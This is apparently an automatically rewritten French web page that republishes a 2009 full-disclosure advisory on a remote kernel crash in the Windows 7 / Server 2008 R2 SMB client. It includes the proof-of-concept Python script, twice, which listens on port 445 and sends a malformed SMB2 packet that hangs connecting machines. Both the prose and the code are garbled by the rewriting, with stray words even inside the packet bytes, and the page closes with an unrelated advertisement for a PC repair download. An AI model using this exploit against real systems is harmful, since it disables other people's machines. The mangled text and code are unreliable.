Table of Contents
Approuvé
Si Windows 9 / Server 2008r2 Remote Kernel plante souvent sur votre ordinateur, nous espérons que ce guide de l’utilisateur pourra aider une personne à résoudre le problème. g.Microsoft Windows utile / Server 2008 R2 SMB Client Infinite Loop: Il exploite un bon échec solide pour effectuer des opérations dans je dirais le client Microsoft Windows SMB trouvé sur Windows 7 plus Windows Server 2008 R2. Il échoue principalement le noyau de support de PC distant. Le Framework Metasploit contient un segment pour exploiter ma vulnérabilité.
g. # ! /usr/tray/python# win7-crash.Trigger py :# crash du noyau de support informatique en ligne sur le serveur hôte Win7 avec 2008R2 (boucle infinie)# Échec de KeAccumulateTicks () en raison de NT_ASSERT () / DbgRaiseAssertionFailure () causé par de puissants# Cycle sans fin.# PAS DE BSOD, VOUS DEVEZ DEBRANCHER LE CONNECTEUR.# Pour l'appeler rapidement ; ordre proche : this_script_ip_addr BLAH, faible consommation soudaine sans effort# Auteur : Laurent Gaffi¯ ¿ ½Importer le serveur de socketPackage = (" x00 x00 x00 x9a" nombre étendu distance ---> doit être 9ème, pas 9a .." xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00"" x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x41 x00 0???#A""?K???R1? "" x00 x00 ?sgtb`?""?Q?b`?? LM ""`+?0sony ericsson xperia x10?""0 +?7")Formation SMB2 (SocketServer.BaseRequestHandler) : Def-Handle (elle-même) : sérigraphie « Qui : », self.client_address Utilisez "MERCI SDL" L'entrée implique self.request.recv (1024) self.request.send (paquet) self.request.close ()le lancement implique SocketServer.TCPServer (('', 445), le numéro SMB2) écoute sur toutes les interfaces en ville 445launch.serve_forever ()
Cette erreur est une preuve importante que SDL FAIL
La cible de l’erreur est simplement une boucle infinie sur smb1,2, pré-authentification, principalement aucune information d’identification requise …
Peut s’avérer être lancé sur le réseau local reçu de (IE *)
L’erreur est très probablement si simple que la maison aurait dû être découverte il y a quelque temps par un SDL spécifique dans le cas où le SDL existait déjà :
netbios_header est égal à struct.pack (“> i”, len (”. visite (SMB_packet)) + SMB_packet
(Les mots de balise netbios h2 indiquent la longueur du nouveau paquet smb1,2.)
Si ce nombre netbios_header est inférieur de 4 octets et supérieur à SMB_packet, la situation est tout simplement violée !
QUEL GENRE ?? Vous plaisantez, où est le SDL personnel ? ! ?
“Le système d’utilisation le plus sûr sur la lumière. е “;
Que votre pare-feu correct soit conçu doit être supprimé via IE, peut-être même avec la méthode de diffusion nbns (aucune interaction avec l’acheteur)
================================================
– Sortie sortir avec : 11 novembre 2009
– Découvert à l’époque de : Laurent Gaffier
– Gravité : moyenne pour chaque haut
==============================================
NS. CONFIRMATION DU CONCEPT
————————–
# win7-crash.py :
# Exécution d’un énorme plantage du noyau distant sous Win7 puis donc Server 2008R2 (boucle infinie)
# KeAccumulateTicks () s’est écrasé en raison de NT_ASSERT () / DbgRaiseAssertionFailure () causé par l’utilisation de # forte boucle infinie.
# PAS DE BSOD, VOUS AVEZ UN LIÈGE.
# Pour l’appeler rapidement ; dans l’ensemble : this_script_ip_addr BLAH, diminuez maintenant
# Posté par Laurent Gaffier
#
Package = (nombre ” x00 x00 x00 x9a” —> la neuvième longueur devrait vraiment être 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 0???#A”
“?K???R1? ”
” x00 x00 ?sgtb`?”
“?Q?b`?? LM ”
“`+?0?”
“0 +?7”)
V. IMPACT COMMERCIAL
————————–
Un attaquant peut loin des autres désactiver n’importe quel serveur Windows 2008R2 certains /
sur le réseau local sinon via IE
VII. Possibilité de patch
————————–
n’est pas disponible pour ce scénario, votre FAI s’en fiche.
Fermez la fonction SMB et les ports jusqu’à ce qu’un examen valide soit fourni.
X. HISTORIQUE DES CHANGEMENTS
————————–
8 novembre 2009 : MSRC a téléphoné à
8 novembre 2009 : MSRC a découvert une vulnérabilité
11 novembre 2009 : MRSC essaie de me convaincre car il existe sans aucun doute un bogue IPv6 de divers magasins qui ne devrait pas apparaître dans les bulletins de mesures de sécurité.
11 novembre 2009 : Ce bug coûteux a été publié.
XI. REMARQUES
————————–
Les informations légales contenues dans cet avis sont fournies “en l’état”
sans représentations ou garanties dans les délais ou autrement.
Je n’accepte pas beaucoup de dommages causés par l’opérateur ainsi que
Utilisation abusive de ces informations.
Divulgation complèteArchives de la liste de diffusion
Date : gmail mercredi 16 novembre 2009 05:58:44 – 05:00
________________________________________________GenderMy divulgation ainsi que des informations - faites confiance dès maintenant.Charte : http://lists.grok.org.uk/full-disclosure-charter.htmlVient de poster et sponsorisé par Secunia Http : // secunia-.com/
Par date Par Câble
Flux actuel :
- Puissant crash du noyau distant Windows Server 2008R2 pour Laurent Gaffy (11 novembre)
Approuvé
L'outil de réparation ASR Pro est la solution pour un PC Windows qui fonctionne lentement, a des problèmes de registre ou est infecté par des logiciels malveillants. Cet outil puissant et facile à utiliser peut rapidement diagnostiquer et réparer votre PC, en augmentant les performances, en optimisant la mémoire et en améliorant la sécurité dans le processus. Ne souffrez plus d'un ordinateur lent - essayez ASR Pro dès aujourd'hui !
Le logiciel pour réparer votre PC est à portée de clic - téléchargez-le maintenant.